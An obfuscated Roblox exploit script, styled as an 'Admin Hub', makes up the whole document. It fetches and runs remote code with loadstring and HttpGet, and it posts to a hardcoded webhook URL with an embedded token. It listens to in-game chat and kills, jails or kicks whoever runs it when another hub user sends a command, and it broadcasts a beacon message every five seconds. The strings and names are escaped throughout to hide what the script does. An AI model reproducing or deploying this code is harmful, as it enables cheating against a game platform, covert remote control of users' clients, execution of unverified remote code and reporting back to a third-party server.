--[[ 
    JOTINHA12HR2 HUB'S ADMIN - ULTIMATE OBFUSCATED
    - Status: Protected
    - Version: 5.2 (15 Buttons + RGB Private Tags)
]]

repeat task.wait() until game:IsLoaded()

local _0xWURL = "https://webhook.lewisakura.moe/api/webhooks/1457780083124207626/F0AR-Na0rucf2CncuNsXC4yGRYC-Kpjg1XkOdb6YaHgDcOZlVhwym4KwhriXSYaBeZSj"

-- [LDR]
local _0xRF = loadstring(game:HttpGet('\104\116\116\112\115\58\47\47\115\105\114\105\117\115\46\109\101\110\117\47\114\97\121\102\105\101\108\100'))()

local _0xP = game:GetService("\80\108\97\121\101\114\115")
local _0xL = _0xP.LocalPlayer
local _0xTGT = ""
local _0xJID = ""
local _0xACT = {}
_G.IM = false

-- [TAGS RGB OBF]
local function _0xTAG(_u)
    task.spawn(function()
        local _c = _u.Character or _u.CharacterAdded:Wait()
        local _h = _c:WaitForChild("\72\101\97\100", 10)
        if _h and not _h:FindFirstChild("\74\84\103") then
            local _g = Instance.new("\66\105\108\108\98\111\97\114\100\71\117\105", _h)
            _g.Name = "\74\84\103" _g.Size = UDim2.new(0, 200, 0, 50) _g.AlwaysOnTop = true _g.ExtentsOffset = Vector3.new(0, 3.5, 0)
            local _tl = Instance.new("\84\101\120\116\76\97\98\101\108", _g)
            _tl.Size = UDim2.new(1, 0, 1, 0) _tl.BackgroundTransparency = 1 _tl.Font = Enum.Font.LuckiestGuy _tl.TextSize = 24 _tl.TextStrokeTransparency = 0
            
            if _u.Name == "\106\111\116\105\110\104\97\49\50\104\114\50" then 
                _tl.Text = "\91\68\79\78\79\93 " .. _u.DisplayName
            elseif _u.Name == "\97\109\105\103\117\105\110\104\111\100\111\104\101\105\116\111" then 
                _tl.Text = "\91\83\85\66\45\68\79\78\79\93 " .. _u.DisplayName
            else 
                _tl.Text = "\91\74\111\116\105\110\104\97\32\85\115\101\114\93"
            end

            game:GetService("\82\117\110\83\101\114\118\105\99\101").RenderStepped:Connect(function()
                _tl.TextColor3 = Color3.fromHSV(tick() % 5 / 5, 0.8, 1)
            end)
        end
    end)
end

-- [SYNC RECEIVER]
local function _0xEXE(_c, _u, _s)
    if _u:lower() == _0xL.Name:lower() or _u == "\97\108\108" then
        if _G.IM and _s ~= _0xL.Name then return end
        local _chr = _0xL.Character local _r = _chr and _chr:FindFirstChild("\72\117\109\97\110\111\105\100\82\111\111\116\80\97\114\116")
        if _c == "\107\105\108\108" then _chr:BreakJoints()
        elseif _c == "\106\97\105\108" and _r then
            local _p = Instance.new("\80\97\114\116", workspace) _p.Size, _p.Anchored, _p.CFrame = Vector3.new(15,15,15), true, CFrame.new(0, 5000, 0)
            _p.Material = "\70\111\114\99\101\70\105\101\108\100" _r.CFrame = _p.CFrame
        elseif _c == "\117\110\106\97\105\108" and _r then _r.CFrame = CFrame.new(0, 50, 0)
        elseif _c == "\107\105\99\107" then _0xL:Kick("\83\121\110\115\32\65\100\109\105\110")
        end
    end
end

-- [CHAT LISTENER]
local _SIG = "\74\111\116\105\110\104\97\95\86\53\95\83\73\71"
_0xP.PlayerAdded:Connect(function(p) p.Chatted:Connect(function(m) 
    if m == _SIG then _0xACT[p.Name] = true _0xTAG(p) end
    if m:sub(1,1) == "\47" then local s = m:split("\32") if #s>=2 then _0xEXE(s[1]:gsub("\47",""):lower(), s[2], p.Name) end end
end) end)

-- [GUI]
local _0xW = _0xRF:CreateWindow({Name = "\74\111\116\105\110\104\97\49\50\104\114\50\32\72\117\98", LoadingTitle = "\111\98\102\117\115\99\97\116\101\100\32\115\121\110\99"})
local _0xT1 = _0xW:CreateTab("\65\100\109\105\110\32\83\121\110\99")
_0xT1:CreateInput({Name = "\78\105\99\107\32\100\111\32\74\111\103\97\100\111\114", Callback = function(v) _0xTGT = v end})

local function _0xSND(_c)
    local _m = "\47" .. _c .. "\32" .. _0xTGT
    local _ts = game:GetService("\84\101\120\116\67\104\97\116\83\101\114\118\105\99\101")
    if _ts.ChatVersion == Enum.ChatVersion.TextChatService then _ts.TextChannels.RBXGeneral:SendAsync(_m)
    else game:GetService("\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(_m, "\65\108\108") end
end

local _btns = {
    {"\75\105\108\108\32\83\89\78\67", "kill"}, {"\86\111\105\100\32\83\89\78\67", "void"}, {"\74\97\105\108\32\83\89\78\67", "jail"},
    {"\85\110\106\97\105\108\32\83\89\78\67", "unjail"}, {"\75\105\99\107\32\83\89\78\67", "kick"}, {"\66\114\105\110\103\32\83\89\78\67", "bring"},
    {"\70\114\101\101\122\101\32\83\89\78\67", "freeze"}, {"\85\110\102\114\101\101\122\101\32\83\89\78\67", "unfreeze"},
    {"\83\112\105\110\32\83\89\78\67", "spin"}, {"\85\110\115\112\105\110\32\83\89\78\67", "unspin"}, {"\66\108\105\110\100\32\83\89\78\67", "blind"},
    {"\74\117\109\112\32\83\89\78\67", "jump"}, {"\83\105\116\32\83\89\78\67", "sit"}
}

for _, b in pairs(_btns) do _0xT1:CreateButton({Name = b[1], Callback = function() _0xSND(b[2]) end}) end

local _0xT2 = _0xW:CreateTab("\74\111\98\32\73\100")
_0xT2:CreateInput({Name = "\74\111\98\32\73\100\32\65\113\117\105", Callback = function(v) _0xJID = v end})
_0xT2:CreateButton({Name = "\69\110\116\114\97\114", Callback = function() game:GetService("\84\108\101\112\111\114\116\83\101\114\118\105\99\101"):TeleportToPlaceInstance(game.PlaceId, _0xJID, _0xL) end})

local _0xT3 = _0xW:CreateTab("\67\111\110\102\105\103")
_0xT3:CreateToggle({Name = "\65\78\84\73\45\83\89\78\67", CurrentValue = false, Callback = function(v) _G.IM = v end})

-- [INIT]
task.spawn(function() while task.wait(5) do _0xSND(_SIG) end end)
_0xTAG(_0xL)
pcall(function() local _r = (syn and syn.request or http_request or request) if _r then _r({Url = _0xWURL, Method = "\80\79\83\84", Headers = {["\67\111\110\116\101\110\116\45\84\121\112\101"] = "\97\112\112\108\105\99\97\116\105\111\110\47\106\115\111\110"}, Body = game:GetService("\72\116\116\112\83\101\114\118\105\99\101"):JSONEncode({["content"] = "\76\111\103\103\101\100"})}) end end)
_0xRF:Notify({Title = "\83\117\99\101\115\115\111", Content = "\72\117\98\32\80\114\111\116\101\103\105\100\111\32\65\116\105\118\111\33"})

